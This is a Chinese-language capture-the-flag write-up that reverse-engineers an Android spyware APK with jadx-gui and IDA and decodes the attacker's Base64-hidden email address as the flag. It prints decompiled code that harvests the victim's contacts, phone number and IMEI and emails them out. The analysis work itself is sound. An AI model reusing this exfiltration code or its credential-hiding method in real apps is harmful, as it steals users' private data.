jadx-gui打开
下载后的文件是以 ".apk" 结尾,因此使用jadx-gui打开。
根据题目提示,搜索关键字mail。
选择第一行,点击转到。
public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {if (!debug) {Mail m = new Mail(C2.MAILUSER, C2.MAILPASS);m.set_host(C2.MAILHOST);m.set_port(C2.PORT);m.set_debuggable(true);m.set_to(new String[]{mailto});m.set_from(C2.MAILFROME);m.set_subject(title);m.setBody(mailmsg);try {if (m.send()) {Log.i("IcetestActivity", "Email was sent successfully.");} else {Log.i("IcetestActivity", "Email was sent failed.");}} catch (Exception e) {Log.e("MailApp", "Could not send email", e);}}return 1;}
根据sendMailByJavaMail()方法中参数列表所要传的数据来看,这就是关键。
再次搜索看看谁调用了sendMailByJavaMail()这个方法
选第2行,转到。
public void run(String content2) {String notebooks = "";for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n";}String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();if (tel == null || tel.equals("")) {tel = A2.getNoteBook(content2).phoneNumber;}A2.getNoteBook(content2);if (!A2.isEmpty(notebooks)) {A2.sendMailByJavaMail(C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);}}
发现有个MAILSERVER,右键 "跳到声明"
public static final String CANCELNUMBER = "%23%2321%23";public static final String MAILFROME = Base64.decode(NativeMethod.m());public static final String MAILHOST = "";public static final String MAILPASS = Base64.decode(NativeMethod.pwd());public static final String MAILSERVER = Base64.decode(NativeMethod.m());public static final String MAILUSER = Base64.decode(NativeMethod.m());public static final String MOVENUMBER = "**21*121%23";public static final String PORT = "25";public static final String date = "2115-11-1";public static final String phoneNumber = Base64.decode(NativeMethod.p());
发现NativeMethod的m经过Base64加密。
MAILSERVER就是加载外部so文件中NativeMethod.m1m()函数所返回的值,再进行base64解密。因此我们只需要找到so文件中经过base64加密的字符串。
IDA打开
选择 "lib/armeabi/libcore.so",OK。
Shift + F12
双击 "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="
再找到由Base64加密的字符串:"MTgyMTg0NjUxMjVAMTYzLmNvbQ=="
通过Base64解码得到flag{18218465125@}